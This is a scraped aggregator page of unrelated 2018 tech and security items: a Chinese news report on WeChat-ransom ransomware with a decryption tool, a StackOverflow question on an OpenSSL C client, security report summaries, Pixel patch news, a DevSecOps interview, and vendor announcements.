用户在遭遇该勒索病毒攻击后, 加密文件中会留下一个“解密工具”的图标,引导用户支付赎金。 用户点击这个图标后,会跳转到一个二维码页面。用户通过微信“扫一扫”功能支付110元赎金,黑客描述称收到赎金后方可解密。目前,该收款二维码已被微信官方冻结。


勒索病毒都开始扫码要赎金了

360互联网安全中心技术人员介绍:该勒索病毒不仅收款方式非常中国化,加密的方法也开始走简约路线了。 该病毒在加密文件时采用了较为原始的异或加密方法,运行后会将特定标识符、版本信息以及随机字符串进行简单处理后存放到C:\Users\unname_1989\dataFile\appCfg.cfg文件中。


勒索病毒都开始扫码要赎金了

病毒开始加密后,会从appCfg.cfg文件的第120字节处读取数据,与病毒自身硬编码的特定字符串进行按位异或,生成密钥,再用这个密钥循环与待加密文件的内容进行异或加密操作。


勒索病毒都开始扫码要赎金了

由于异或计算是一种非常简单的加密方式,所以对该勒索病毒的技术性解密也就成为了可能。

对此,360安全大脑发布预警,电脑用户(尤其是游戏玩家)不用轻信外挂或私服所声称的“杀毒软件误报论”,不要轻易把此类程序添加到信任列表中,要求退出杀软的外挂,坚决不用;个人用户平时应当养成及时修复漏洞的好习惯;服务器管理者还应关注厂商安全更新,及时修复Web应用、数据库等各类应用平台的漏洞。

对于已经中招的用户,360解密大师已经支持对此勒索病毒的解密,用户可以在安全卫士 功能大全中搜索下载“360解密大师”解密被加密的文件。

SSL &sol; HTTPS C Client

$
0
0

I've written a simple SSL/HTTPS client in C using some example code I found, when I use it to send a GET request to an https server I get an unusual response, this is the response from stackoverflow.com:

HTTP/1.1 200 OK Cache-Control: public, no-cache="Set-Cookie", max-age=36 Content-Type: text/html; charset=utf-8 Expires: Sat, 03 Jan 2015 16:54:57 GMT Last-Modified: Sat, 03 Jan 2015 16:53:57 GMT Vary: * X-Frame-Options: SAMEORIGIN Set-Cookie: prov=407726d8-1493-4ebd-8657-8958be5b2683; domain=.stackoverflow.com; expires=Fri, 01-Jan-2055 00:00:00 GMT; path=/; HttpOnly Date: Sat, 03 Jan 2015 16:54:20 GMT Content-Length: 239129

<title>Stack Overflow</title> <link rel="shortcut icon" href="//cdn.sstatic.net/stackoverflow/img/favicon.ico?v=038622610830"> <link rel="apple-touch-icon image_src" href="//cdn.sstatic.net/stackoverflow/img/apple-touch-icon.png?v=fd7230a85918"> <link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml"> <meta name="twitter:card" content="summary"> <meta name="twitter:domain" content="stackoverflow.com"/> <meta property="og:type" content="website" /> <meta property="og:image" itemprop="image primaryImageOfPage" content="http://cdn.sstatic.net/stackoverflow/img/<a href="/cdn-cgi/l/email-protection" data-cfemail="c6a7b6b6aaa3ebb2a9b3a5aeebafa5a9a886f4e8b6a8a1">[email protected]</a>?v=fde65a5a78c6"

/>

When I use the openssl command line tool to perform the same operation I get a normal response containing the index page. I've tried changing some of the code and followed different tutorials but nothing seems to work. How do I get the program to return the index page instead of the response I currently get?, here's the source code for the program:

#include <stdlib.h> #include <stdio.h> #include <string.h> #include <openssl/bio.h> #include <openssl/ssl.h> #include <openssl/err.h> /** * Simple log function */ void slog(char* message) { fprintf(stdout, message); } /** * Print SSL error details */ void print_ssl_error(char* message, FILE* out) { fprintf(out, message); fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error())); fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL)); ERR_print_errors_fp(out); } /** * Print SSL error details with inserted content */ void print_ssl_error_2(char* message, char* content, FILE* out) { fprintf(out, message, content); fprintf(out, "Error: %s\n", ERR_reason_error_string(ERR_get_error())); fprintf(out, "%s\n", ERR_error_string(ERR_get_error(), NULL)); ERR_print_errors_fp(out); } /** * Initialise OpenSSL */ void init_openssl() { /* call the standard SSL init functions */ SSL_load_error_strings(); SSL_library_init(); ERR_load_BIO_strings(); OpenSSL_add_all_algorithms(); /* seed the random number system - only really nessecary for systems without '/dev/random' */ /* RAND_add(?,?,?); need to work out a cryptographically significant way of generating the seed */ } /** * Connect to a host using an encrypted stream */ BIO* connect_encrypted(char* host_and_port, char* store_path, SSL_CTX** ctx, SSL** ssl) { BIO* bio = NULL; int r = 0; /* Set up the SSL pointers */ *ctx = SSL_CTX_new(TLSv1_client_method()); *ssl = NULL; r = SSL_CTX_load_verify_locations(*ctx, store_path, NULL); if (r == 0) { print_ssl_error_2("Unable to load the trust store from %s.\n", store_path, stdout); return NULL; } /* Setting up the BIO SSL object */ bio = BIO_new_ssl_connect(*ctx); BIO_get_ssl(bio, ssl); if (!(*ssl)) { print_ssl_error("Unable to allocate SSL pointer.\n", stdout); return NULL; } SSL_set_mode(*ssl, SSL_MODE_AUTO_RETRY); /* Attempt to connect */ BIO_set_conn_hostname(bio, host_and_port); /* Verify the connection opened and perform the handshake */ if (BIO_do_connect(bio) < 1) { print_ssl_error_2("Unable to connect BIO.%s\n", host_and_port, stdout); return NULL; } if (SSL_get_verify_result(*ssl) != X509_V_OK) { print_ssl_error("Unable to verify connection result.\n", stdout); } return bio; } /** * Read a from a stream and handle restarts if nessecary */ ssize_t read_from_stream(BIO* bio, char* buffer, ssize_t length) { ssize_t r = -1; while (r < 0) { r = BIO_read(bio, buffer, length); if (r == 0) { print_ssl_error("Reached the end of the data stream.\n", stdout); continue; } else if (r < 0) { if (!BIO_should_retry(bio)) { print_ssl_error("BIO_read should retry test failed.\n", stdout); continue; } /* It would be prudent to check the reason for the retry and handle * it appropriately here */ } }; return r; } /** * Write to a stream and handle restarts if nessecary */ int write_to_stream(BIO* bio, char* buffer, ssize_t length) { ssize_t r = -1; while (r < 0) { r = BIO_write(bio, buffer, length); if (r <= 0) { if (!BIO_should_retry(bio)) { print_ssl_error("BIO_read should retry test failed.\n", stdout); continue; } /* It would be prudent to check the reason for the retry and handle * it appropriately here */ } } return r; } /** * Main SSL demonstration code entry point */ int main() { char* host_and_port = "stackoverflow.com:443"; char* server_request = "GET / HTTP/1.1\r\nHost: stackoverflow.com\r\n\r\n"; char* store_path = "mycert.pem"; char buffer[4096]; buffer[0] = 0; BIO* bio; SSL_CTX* ctx = NULL; SSL* ssl = NULL; /* initilise the OpenSSL library */ init_openssl(); if ((bio = connect_encrypted(host_and_port, store_path, &ctx, &ssl)) == NULL) return (EXIT_FAILURE); write_to_stream(bio, server_request, strlen(server_request)); read_from_stream(bio, buffer, 4096); printf("%s\r\n", buffer); /* clean up the SSL context resources for the encrypted link */ SSL_CTX_free(ctx); return (EXIT_SUCCESS); }

You call read_from_stream to read at most 4096 bytes, but the answer may be much longer than this. You must retry to read until the call returns 0. You msut also clean the buffer before each read. Like this:

int l; bzero(buffer,4096); // clean the buffer while ((l=read_from_stream(bio,buffer,4096)) { // try to read 4096 bytes printf("%s",buffer); // write exactly what was read... bzero(buffer,4096); // clean the buffer }

Be careful that the server can send you ASCII nul bytes (rare in HTML pages, but possible for another kind of data)... This code doesn't take this into account.

Normally you have to decode headers, and decode the Content-Length: one. It is intended to give you the number of bytes of data to read after HTTP headers (in your example it is 239129).

研究显示,网络安全威胁在不断演变

$
0
0

网络安全行业研究报告是掌握最新威胁的一种很好的方法,还能够防止这些漏洞影响您对组织的控制。2018年11月发布的研究涵盖了IT风险的所有领域,包括身份、应用程序容器、漏洞披露以及全球威胁形势本身。以下是本月发布的11份报告的要点,以及网络防御组织应该考虑实施的内容。


研究显示,网络安全威胁在不断演变
Distill Networks――机器人如何影响航空公司
研究显示,网络安全威胁在不断演变

通常被称为机器人的自动化过程其目的可能是好的也可能是坏的。在Distil Networks 11月14日发布的一份报告中,研究人员表示,恶意机器人在航空公司网站、移动应用程序和API上尤其普遍,占流量的43.9%。

Distil发现,尽管一些智能程序并不复杂,但航空公司域名上84.3%的智能程序是中等或高级的,很难进行检测。恶意机器人可以用来冒充真实用户,窃取凭证以及进行其他的恶意活动。

Distil Networks服务副总裁Mike Rogers表示:“最近几个月,航空公司的不法行为有所上升,这表明这个行业已经具备了足够的信息,可以用于盈利或制造破坏。

Fortinet全球威胁景观报告
研究显示,网络安全威胁在不断演变

11月14日发布的《Fortinet全球威胁前景报告》(Fortinet Global Threat Landscape report)全面审视了过去几个月网络安全方面的一些趋势。

报告中的高级调查结果显示,独特的恶意软件再次呈上升趋势,Fortinet观察到,这种软件的年增长率为43%。Fortinet还表示,恶意软件家族的数量增长了32%。

对于HTTPS加密流量的使用也达到了一个新的里程碑,占所有网络流量的72%,高于2017年的55%。

“网络威胁正在迅速增长,每个组织都感受到了影响,每天的检测和攻击都在增加。”在此之前,勒索软件是当时的热门话题,而现在加密、移动恶意软件和针对关键业务供应链的攻击正在激增,”Fortinet首席信息安全官Phil Quade表示。

关键要点:恶意软件看起来像是一种老派的攻击形式,但它仍在增长,企业需要适当的反恶意软件、网络和EDR技术来限制风险。

Intelisecure
研究显示,网络安全威胁在不断演变

根据InteliSecure在11月15日发布的《2018年关键数据保护状态报告》显示,组织如何思考和实际保护敏感数据方面存在重大差距。

报告发现,90%的受访企业制定了政策,规定如何在员工系统上存储和保护敏感数据。尽管有这些策略,大多数组织并没有一个程序化的方法来维护它们。

InteliSecure首席执行官Steven Drew表示:“尽管对企业的威胁在规模、成熟度和频度上持续增长,但网络安全行业技能短缺显然更加令大多数企业感到失望,尤其是那些选择单干的企业。”

关键要点:为敏感数据管理制定一个策略是很好的,但是拥有工具、流程和人员来实际执行策略更好。

ObserveIT假日旅行网络安全风险调查
研究显示,网络安全威胁在不断演变

据ObserveIT在11月15日发布的一份报告显示,旅行代表着网络安全风险。

在旅行期间暴露的巨大风险中,77%的受访者表示在旅行中有使用过免费或者公共Wi-Fi。此外,63%的受访者承认,他们在旅行中使用过免费的公共Wi-Fi连接工作邮件和文件。

尽管假期应该是休息时间,但55%的受访者表示,他们会在假期旅行期间随身携带办公设备。

ObserveIT首席执行官Mike McKee在一份声明中写道:“这项研究不仅证实,员工外出旅行时并不把网络安全放在首位,而且还突显出安全意识培训方面的不足,不能有效缓解远程工作带来的威胁。”“尽管技术让人们无论身处何地都能高效工作,但它也为黑客侵入原本安全的系统创造了新途径。”

关键提示:警惕免费的公共Wi-Fi,并使用VPN帮助保护和促进远程访问。

Ping Identity:后黑客时代的态度和行为
研究显示,网络安全威胁在不断演变

数据泄露对消费者忠诚度和参与度有何影响?这是Ping Identity 2018消费者态度与行为调查回答的关键问题。

在11月7日的调查中,78%的受访者表示,在遭遇数据泄露后,他们将停止与某个品牌的在线合作。此外,49%的人表示他们不会使用最近遭遇数据泄露的在线服务或应用程序。

数据泄露也影响着消费者的行为,47%的受访者表示,由于最近的数据泄露,他们已经改变了保护个人数据的方式。

Ping Identity首席技术官Sarah Squire表示:“随着数据泄露的盛行,企业必须有适当的控制措施,否则它们将面临失去消费者信任和业务的风险。”“正如人们期望品牌为用户提供友好的体验一样,它们也必须理解强大的身份管理策略的价值以及重要性。”

关键要点:通过保护身份和访问管理,准备并限制数据泄漏的风险,并考虑利用泄漏和攻击模拟(BAS)技术。

Risk Based Security2018年第三季度报告
研究显示,网络安全威胁在不断演变

尽管Fortinet报告称,它发现的独特恶意软件家族数量有所增加,但Risk Based Security在2018年第三季度的漏洞报告中提供了不同的观点。

11月15日的报告发现,与2017年同期相比,2018年前三个季度的漏洞数量减少了7%。然而,并非所有漏洞都是相同的,其严重性和影响各不相同。基于风险的安全报告显示,第三季度15.4%的漏洞被评为“关键”。

从缺陷的根本原因来看,67.3%的漏洞是由于输入验证不足或不正确造成的。并非所有的缺陷都有解决方案,这是报告指出的一个关键挑战。超过四分之一(24.9%)的报告漏洞目前没有已知的解决方案。

“在大多数组织意识到这些问题之前,我们就已经看到了很多漏洞被积极利用。”在损害已完成后才对漏洞有所了解,这是一个很不幸的情况。负责基于风险的安全漏洞情报的副总裁Brian Martin说。

关键结论:有一个积极的补丁管理策略,以及时处理补救措施。

SailPoint第十届年度市场脉搏调查
研究显示,网络安全威胁在不断演变

SailPoint于11月13日发布的第10届年度市场脉动调查(Market Pulse Survey)提供了对身份治理实践的深入了解。

调查的重点之一是,75%的受访者承认在多个账户(包括个人账户和工作账户)中重复使用密码。与2014年相比,这是一个显著的增长,当时只有56%的受访者承认做过同样的事情。

员工不仅越来越忽视密码的最佳实践,他们还忽视了其他被认为不方便的IT策略。在SailPoint的调查中,55%的受访者表示,他们的IT部门可能会给他们带来不便。这种不便导致员工忽视IT策略,安装自己的软件。

SailPoint的CMO Juliette Rizkallah说:“为了保障和支持当今的员工团队,用户已经成为新的‘安全边界’,他们的数字身份是组织在数字转型每个阶段的IT生态系统的共同纽带。”

关键要点:确保它是对员工的一种激励,而不是他们需要四处走动的一种不便。在可能的情况下,锁定公司所有的设备,以控制下载的内容,并加强密码管理。

Secureworks: :2018年网络犯罪状况报告
研究显示,网络安全威胁在不断演变

据11月13日发布的《2018年网络犯罪安全工作状态报告》显示,网络犯罪组织越来越多,使用的技术也越来越先进。

从2017年7月到2018年6月,安全工程反威胁小组(CTU)的研究人员分析了事件响应结果,并进行了原始研究,以深入了解4400家公司的威胁活动和行为。

报告的一项关键发现是:民族国家行为者越来越多地使用网络罪犯使用的工具和技术,反之亦然。Secureworks报告称,犯罪网络团伙现在使用先进的社会工程技术,同时使用带有销售点(POS)恶意软件的网络入侵方法。

“网络犯罪是一个利润丰厚的行业,它能够成为强大、有组织的团体分支也就不足为奇了,”安全工程反威胁部门(Secureworks Counter Threat Unit)网络情报单元高级主管Don Smith表示。

关键要点:了解宏观安全形势,并拥有能够应对有针对性和高级持续性威胁的控制。

StackRox容器安全状态
研究显示,网络安全威胁在不断演变

11月14日,StackRox发布了其首份《容器安全状态报告》,深入研究了应用程序容器安全的新生世界。

容器可以在多种类型的部署中运行,StackRox发现,它的调查对象中有40%在混合环境中运行容器,包括在场所和云中。

在容器安全方面,54%的受访者表示,他们最担心的是错误配置和数据意外泄露。44%的组织指出,他们更关心容器的运行时阶段,而不是构建和部署阶段。

StackRox首席执行官Kamal Shah说:“DevOps的影响以及容器化和Kubernetes的快速普及使得应用程序开发比以往任何时候都更加无缝、高效和强大。”“然而,我们的调查结果显示,在企业的容器战略中,安全仍然是一个重大挑战。”

关键结论:拥有能够监控和管理应用程序运行时行为的技术,不管它们是在容器中运行还是在其他地方运行。

Tanium弹性差距研究
研究显示,网络安全威胁在不断演变

虽然不可能阻止所有攻击,但组织可以构建基础设施和流程,使操作更具弹性。

11月14日发布的Tanium弹性缺口研究发现,在企业应对网络攻击的弹性方面存在分歧。96%的受访者表示,他们认为,使技术适应业务中断应该是公司更广泛的业务战略的核心。

然而,现实情况是,只有61%的受访者声称,他们的企业实际上能够应付业务中断。

Tanium 的CSO David Damato说:“技术发展的速度和复杂性已经促使企业购买多种工具,以解决IT安全和运营方面的挑战。”“反过来,这又造成了端点管理和安全解决方案的碎片化集合,使得企业环境变得脆弱,易受攻击,缺乏能够减轻威胁所需的业务弹性。”

关键要点:不要只关注威胁检测和识别,还要考虑企业在面临威胁时的弹性和继续运营的能力。

Tenable漏洞情报报告
研究显示,网络安全威胁在不断演变

根据11月7日Tenable发布的漏洞情报报告,预计2018年将有1.9万个漏洞被披露,比2017年增加27%。据Tenable报道,企业平均每天识别870个独特的漏洞。

并不是所有的漏洞都具有相同的严重性,平均每天只有100个左右的漏洞具有严重影响。根据Tenable的说法,组织整体上仍在努力应对警报和漏洞活动的数量以及制定相关的补救行动。

“当一切都很紧急时,分流就会失败。”产品管理高级总监Tom Parsons说。“作为一个行业,我们需要意识到,如果要有效的降低网络风险,首先要对问题进行有效的优先排序。”

关键要点:确保有一个漏洞管理系统,并了解优先考虑补丁和修复的实际风险是什么。

December security patch rolling out to Pixel & Nexus, factory images and O ...

$
0
0

The Pixel 3 and Pixel 3 XL received its first update to address a handful of bugs with last month’s security patch . Since then, more issues have arisen, with the December security patch rolling out today to address them. Meanwhile the Nexus 5X and 6P are still receiving updates for this month.

The Nexus 5X, Nexus 6P, and Pixel C are still receiving security updates , despite meeting the required three-year deadline of required fixes from Google last month. Meanwhile, the Pixel and Pixel XL patch is again delayed, like in November.

There are 17 issues resolved in the December security patch dated2018-12-01 and 36 for 2018-12-05. Vulnerabilities rangefrom high tocritical, with the most severe relating to the media framework and a remote attacker possibly executing arbitrary code through a crafted file.

As usual, Google notesthat there are no reports of customers being affected by these security issues. The company cited in its 2017 year in review of Android security that 30% more devices are getting patches compared to the prior year.

The dedicated bulletin for Google’s phones and tablets lists one additional security fix and 13 functional updates.


December security patch rolling out to Pixel &amp; Nexus, factory images and O ...

The full download and OTA links for the December security patch are below. If you need help, check out our guides on how toflasha factory orOTA image.

Android 9.0 Pixel 3 XL: Android 9.0 ―PQ1A.181205.006 ― Factory Image ― OTA Pixel 3: Android 9.0 ―PQ1A.181205.006 ― Factory Image ― OTA Pixel 2 XL: Android 9.0 ―PQ1A.181205.002 ― Factory Image ― OTA Pixel 2: Android 9.0 ―PQ1A.181205.002 ― Factory Image ― OTA Pixel C: Android 8.1― OPM8.181205.001― Factory Image ― OTA Nexus6P: Android 8.1―OPM7.181205.001 ― Factory Image ― OTA Pixel 5X: Android 8.1―OPM7.181205.001 ― Factory Image ― OTA

Check out 9to5Google on YouTube for more news:

Q&A Rain Capital’s Chenxi Wang on ‘DevSecOps’

$
0
0

CloudBees sponsored this story, as part of an ongoing series on “ Cloud Native DevOps .” Check back through the month on further editions.

Turning your IT shop into a DevOps shop is the way to go if you are in a competitive industry based any way at all on the quality and feature set of your software. But, as Marriott has just discovered , all your work will be for naught if a malicious attacker penetrates your system. But how do you get security into the flow of your software lifecycle?

For answers, we sought out Dr. Chenxi Wang , the founder and General Partner of Rain Capital , an early stage Cybersecurity-focused venture fund. Dr. Wang is also the co-founder of the Jane Bond Project , a cybersecurity consultancy.

Prior to that, Chenxi served as the Chief Strategy Officer at Twistlock, was in large part responsible for that cloud native security company’s early growth. Before that, Chenxi built an illustrious career at Forrester Research, Intel Security, and CipherCloud. At Forrester, Chenxi wrote many hard-hitting research papers. At Intel Security, she led the ubiquity strategy spanning both hardware and software platforms. Chenxi started her career as a faculty member of Computer Engineering at Carnegie Mellon University.


Q&amp;A Rain Capital’s Chenxi Wang on ‘DevSecOps’
So, we want to find out more about security for cloud native operations, and how it affects DevOps practices…

The cloud native environment is such that things just come and they go very easily. You’ve got an ephemeral sort of workload. And you also got very a potentially a large scale system. Lots of cloud native environments have internet-scale applications. So, you got very large systems that are dynamically orchestrated. So that’s kind of the nature of it.

So a few things security cannot rely on is, for instance, security becoming part of an infrastructure, you have to be very careful about embedding security into the infrastructure.

For instance, in the past, you could instrument the server, right? But if you don’t know where your workloads going to run tomorrow. They go from this cloud to the other cloud, then you may not be able to count on this type of server instrumentation everywhere.

If you are using serverless then you can’t really instrument the server, so lot of things have to push up the stack into the application layer. [The instrumentation] travels with the application for instance. Or it’s done through a different set of infrastructure, like security is done through the orchestrator, for instance. So thinking about where in the infrastructure layer security is going to fit is an interesting thing for the cloud native environment.

I’m kind of curious about the idea of moving up the stack to the application layer. Either you think about the application security and you also think about doing as much through the orchestrator as possible because those are the key elements are always going to be there in a cloud environment.

I’m seeing less of the kernel level agents more the user-land capabilities. I’m also seeing a lot of data that is only now decrypted at the application, not in the network. The data security policies all have to happen very close to the application. So, that’s the part that is really interesting I think.

Things are coming out of infrastructure and getting pushed to the application layer. But I don’t mean things that are embedded into the application per se but they are actually being separated out from the application as a separate entity. So if you think about the service mesh ―the service mesh is a new capability that abstracts networking and security from the application.

So at the same time as things get pushed to layer seven things also getting more modular in the sense that application developers can focus on application. They don’t have to worry about networking, they don’t have to worry about security and, security and networking functions are being encapsulated into sort of manageable units itself being microservice driven. So I see that as a march trend where things are moving in that direction.

Authentication itself is a difficult thing to do. And so it’s better [this way]. Somebody in the organization sets up a standard for the useful tools [to use]. And here’s your certificate authority because that would be a lot to ask of each at each developer for each application even to do it correctly. That’s something for all of them to agree on something. That sounds a bit like the Google Zero Trust Model ?

Yes. So it’s … I wouldn’t say the Google Zero Trust model, the Zero Trust models actually defined by Forrester. Google had its own version of zero trust, which it called BeyondCorp . And at the most fundamental layer, they are both the same thing. They basically say “OK, so if I’m an application, I want to talk to the other application. I want that network between us to just be a conduit. The network is not going to see me anything other than metadata. It’s not a new process payload is not going to process identities. It’s just going to be a dumb pipe.”

And that has a lot of implications when you cannot do network level, interception and filtering. So things have to happen either on the endpoint or the application. It’s happening more readily in a cloud native environment because everything is decentralized anyway, and it’s easier to treat [issues] inside your corporate [environment] in the same way as [those] external to your company Are there issues we should think about when talking about security DevSecOps?

Yes, absolutely. So another aspect of cloud native applications is that they are updated all the time. And as new functions getting pushed to production systems, security has to be with it. Security has to be part of the CI/CD pipeline.

In the past you have with the major releases, you have your security reviews and security testing all done. Everything else stops until you finish that. That doesn’t work anymore, so vulnerability scanning has to be done in a way that fits seamlessly into the CI/CD process.

Are you finding that there are two total providers who are moving in this direction?

If you look at security, automation is probably one of the biggest recurring themes we’ve heard of late. Security has gone from the manual review to security engineering, meaning that the tasks are carried out automatically. The metrics are gathered automatically, the different tasks are stitched together automatically and reporting is done automatically.

I don’t think we are 100 percent there yet, it’s definitely happening in that direction.

Culture seems to be a big issue that an organization must face when moving to DevOps. It’s getting developers and system administrators on the same page and having them rethink their jobs.What are some of the issues that people should think about in terms of DevOps in light of security? So, yes. One thing in terms of culture is I think security products and security technology in the past are predominantly produced for security users right? So you, the users of

Google addresses Pixel 3 RAM management, camera performance, and more w/ Decembe ...

$
0
0

Google detailed the December security patch this morning for all Android devices. For the Made by Google lineup, this update addressesa number of issues that have cropped up since the launch of the Pixel 3 and Pixel 3 XL . Fixes includeRAM management and camera performance.

ThePixel / Nexus Security Bulletin for December 2018 notes 13 “functional patches,” in addition to one security update.

These updates are included for affected Pixel devices to address functionality issues not related to the security of Pixel devices. The table includes associated references; the affected category, such as Bluetooth or mobile data; improvements; and affected devices.

One of the most important issues addressed by this month’s patch is aggressive memory management that would prevent some apps from runningsimultaneously. For example, snapping a picture with the camera app stopped background audio playback for some users.

Last month,Google confirmed that the fix would“keep background apps from being prematurely closed,” with it being refered to as “ Improved memory performance in certain circumstances ” and “ Improved camera capture performance ”in the December security patch. It applies to both the Pixel 2 and Pixel 3 line.

Also on the camera front, Google notes “ Adjusted autofocus behavior ” and “ Improved camera shutter performance ” for the Pixel 3 and Pixel 3 XL. There is also “ Improved contouring on HDR color on certain media apps ” for the new phones. Meanwhile, the Pixel Stand benefits from “ Improved notification visibility ” and “ Improved hotword performance . “

Google notes “ Improved Android Auto compatibility ” for the second and third-generation Pixel devices, as well “ Improved audio performance for when using Android Auto in certain vehicles ” on the Pixel 3.

Another issue with the display involves flickering on the Ambient Display is likely fixed with “ Improved Always On Display triggering . ”

As they move the device around, the Pixel 3 display flickering issue kicks in and lights up the bottom portion of the display in a bright white before going back to normal. In this user’s case, the issue started about three weeks after receiving the phone.

Other fixes include “ Improved USB-C Audio accessory detection ” on the Pixel 3 XL, while all Pixel phones benefit from “ Adjusted volume behavior when toggling Bluetooth ” and “ Improve unlocking performance when using Bluetooth .”


Google addresses Pixel 3 RAM management, camera performance, and more w/ Decembe ...

Check out 9to5Google on YouTube for more news:

Mesosphere Partners with Macquarie Government

$
0
0

Today, we are excited to announce our partnership with Macquarie Government . This exclusive partnership will make Mesosphere’s industry-leading cloud management technologies available to the Australian government and combines the power of Mesosphere’s big data platform-as-a-service and next generation application development with Macquire’s federally accredited cloud services.

This partnership will enable government agencies, throughout the country, to drive and leverage their big data investments, reduce their public cloud spend by up to 30 percent, and cut project application development lifecycles by almost 50 percent. In addition, it will give them the freedom and choice in their IT environment, all while accelerating their time to value for new digital initiatives.

“Macquarie Government is committed to delivering innovations that create a performance and security benefit for our government customers and steer their agencies toward a more efficient digital future,” said Aidan Tudehope, Managing Director.

The Macquarie Government and Mesosphere partnership will enable government agencies to modernize their IT environment for increased agility, flexibility, management, and security.

“The partnership with Macquarie Government is exciting, as it will expand the data services and frameworks offered on the DC/OS Service Catalogue,” said William Freiberg, Chief Operating Officer, Mesosphere.

“We look forward to working with the Macquarie Government team to assist federal and state governments to break the shackles of proprietary cloud lock-in and deliver an accelerated time-to-market with the infrastructure and services needed to deploy machine learning and IoT applications at scale.”

December security update brings fixes for memory, camera, and more to the Google ...

$
0
0

At the beginning of every month, Google releases new Android security patches for their devices and outlines updates for the ecosystem as a whole. These updates are usually not terribly exciting with a few notable fixes here and there. This month, however, includes pretty big updates for thePixel 3,Pixel 3 XL, Pixel, andPixel 2 XL. Google is finally addressing the aggressive RAM management, among other things.

The Pixel/Nexus Security Bulletin this month includes a whopping 13 functional patches, most of which are for Pixel 3 devices. You’ll notice the theme around the patches is “improved” and “adjusted.”

Category Improvements Devices Performance Improved memory performance in certain circumstances Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL Camera Improved camera capture performance Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL Pixel Stand Improved notification visibility when using Pixel Stand Pixel 3, Pixel 3 XL Android Auto Improved Android Auto compatibility Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL Camera Adjusted autofocus behavior Pixel 3, Pixel 3 XL Pixel Stand Improved hotword performance when using Pixel Stand Pixel 3, Pixel 3 XL Display Improved Always On Display triggering Pixel 3, Pixel 3 XL Audio Improved USB-C Audio accessory detection Pixel 3 XL Bluetooth Adjusted volume behavior when toggling Bluetooth Pixel,Pixel XL, Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL Android Auto Improved audio performance for when using Android Auto in certain vehicles Pixel 3, Pixel 3 XL Media Improved contouring on HDR color on certain media apps Pixel 3, Pixel 3 XL Camera Improved camera shutter performance Pixel 3, Pixel 3 XL Performance Improve unlocking performance when using Bluetooth Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL

The first patch on the list is something Pixel owners have been complaining about for a while. Google stuck with 4GB of RAM on the Pixel 3 and the aggressiveRAM management forces apps to close prematurely. This can be annoying when switching between apps frequently. They also “improved” the performance of the camera, which is another thing that was a common complaint.

Pixel 3 XDA Forum Pixel 3 XL XDA Forum

The OTA files and factory images for the Pixel and Nexus devices can be found at the links below.Find the Android security files for your device and click “Link” to start the download. To flash the update manually without losing all of your data, follow the steps outlined in this tutorial .

Arlo's new security camera has a 4K sensor and built-in spotlight

$
0
0

A more technically impressive device than the Arlo or Arlo Pro cameras, the Ultra is a high-end, indoor and outdoor solution for smart home security. The 4K lens, which as a 180-degree diagonal field of view, makes it easy to zoom in on small details on captured footage. The camera is also smart enough to spot action on its own with audio and motion detection. When it identifies someone or something of interest, the Ultra can start blaring a siren, use its bright spotlight or evencall 911 for you.

To get the most out of the Arlo Ultra, you'll have to combine the camera with the company's subscription service, Arlo Smart. You'll get one year free if you buy the camera but will have to fork over at least $29 per year after that, depending on what types of features you're looking for. It's worth noting that the free year of the Smart subscription will only save your footage in 1080p, not the full 4K resolution that the camera is capable of. For that, you'll need to purchase another add-on. Alternatively, you can use an SD card to save the footage locally.

A single Arlo Ultra camera will run $400, and you can save a little when you purchase a multi-camera system. Arlo is offering bundles of up to four cameras. While the company's security suite is generally well-regarded, it suffered somesignificant outages earlier this year that knocked cameras offline.

What is Data Sprawl?

$
0
0

Imagine that you need to complete your taxes, but all your relevant papers are secreted in drawers, hidden in closets, and stuffed under couch cushions. Now imagine that you have multiple copies of the forms in these places, and some are written in Greek, while others are written in English and Spanish. How will you do your taxes, or clean your house for that matter, when this is the state of things? Unfortunately, this is a problem that is starting to plague companies across the world. This is data sprawl.

Data sprawl refers to the overwhelming amount and variety of data produced by enterprises every day. With the growing number of operating systems, data warehouses, various BYOD (Bring Your Own Device) devices, and enterprise and mobile applications, it’s no wonder that the proliferation of data is becoming a problem.

The problem of data sprawl is twofold:

Getting value from your data . One issue is that the data is spread out across many data stores, and on different devices and servers. This makes it incredibly difficult to get value from your data. How can you perform comprehensive analytics when your data may be stored across many locations, or is duplicated in locations, and is in different formats? How will you gather all this information in one place? How will you get your data into a similar format so that you can compare apples to apples? Security . Data sprawl also creates security concerns. BYOD proliferating in the workforce means that endpoints must be secured, even as data is leaving your network via an array of devices. But, what about your servers and data stores that are maintained by different departments? Are these systems secure? Do they all follow the same compliance requirements? Is personally identifiable information (PII) being removed when moving data from one system to another? Is the data encrypted when it’s being shared across systems? These are all security concerns that are magnified by data sprawl. Why does data sprawl happen?

Data sprawl happens for many reasons.

Employees may bring an array of devices to work and use those devices for work purposes. There are vast numbers of new data sources available from many places, such as JSON files, new RDBMS sources, or streaming data from traffic sensors, health sensors, transaction logs, and activity logs. Your company may use varied operating systems such as windows, Mac, linux. Your data may be stored in a variety of data storage systems across your network and the cloud. Your data might be siloed, so that it is stored in multiple places based on department, geography, or some combination of these. Your data may be duplicated across numerous systems and use a range of formatting. How can you manage data sprawl?

There are a number of tools to handle the security aspect of data sprawl. For example, there are many DLP (Data Loss Prevention) tools that help identify sensitive data in your network and ensure that it doesn’t leave your network in non-secure ways. Popular vendors include Checkpoint , Forcepoint , and Symantec .

For cloud tools, there are single sign-on tools that help employees to seamlessly access cloud applications outside of the network while maintaining a secured sign-on. Popular vendors include JumpCloud , Microsoft Azure , Okta , and Onelogin . This can help control the security for BYOD devices.

But, what about how data sprawl affects the way that you do business? What tools are available to help you handle your data, get it in one place, remove duplicates, and ensure that it’s secure while you move it? A powerful ETL (Extract, Transform, and Load) tool can help you bring your data together where you can analyze it. As you move the data, you can cleanse it, remove duplicates, and transform the data types so the data formatting is aligned. Popular vendors includeAlooma, IBM Infosphere ,Informatica, andTalend.

The Alooma difference

